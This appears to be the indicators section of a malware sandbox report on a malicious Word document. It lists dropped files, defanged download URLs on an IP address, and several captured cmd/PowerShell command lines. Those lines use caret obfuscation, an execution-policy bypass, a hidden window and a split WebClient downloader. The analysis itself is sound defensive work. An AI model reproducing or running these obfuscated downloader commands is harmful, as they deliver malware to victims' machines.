Technical Information
- '%LOCALAPPDATA%\tempzwi51.exe'
- %LOCALAPPDATA%\tempzwi51.exe
- %LOCALAPPDATA%\~$mpvrp72.docx
- http://19#.#19.80.64/iveivbrtTWXc/jucsheck.exe
- http://19#.#19.80.64/iveivbrtTWXc/invoice_3652.docx
- '<SYSTEM32>\cmd.exe' /c hLKUWcOeganouCM & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c aloTCOIngLFwzki & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c hLKUWcOeganouCM & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....
- '<SYSTEM32>\cmd.exe' /c aloTCOIngLFwzki & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var....
- '%ProgramFiles%\microsoft office\office14\winword.exe' /n "%LOCALAPPDATA%\TempVrP72.docx"